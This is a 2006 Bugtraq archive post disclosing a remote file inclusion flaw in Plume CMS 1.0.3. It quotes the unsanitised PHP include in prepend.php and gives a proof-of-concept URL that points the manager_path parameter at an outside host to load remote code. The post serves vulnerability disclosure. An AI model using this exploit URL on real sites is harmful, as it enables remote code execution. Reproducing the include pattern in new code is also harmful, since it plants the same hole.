Bugtraq mailing list archives

Plume CMS Remote File Include

From: beford <xbefordx () gmail com>
Date: Fri, 26 May 2006 11:50:15 -0500

Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]


http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet

Current thread:

Plume CMS Remote File Include beford (May 26)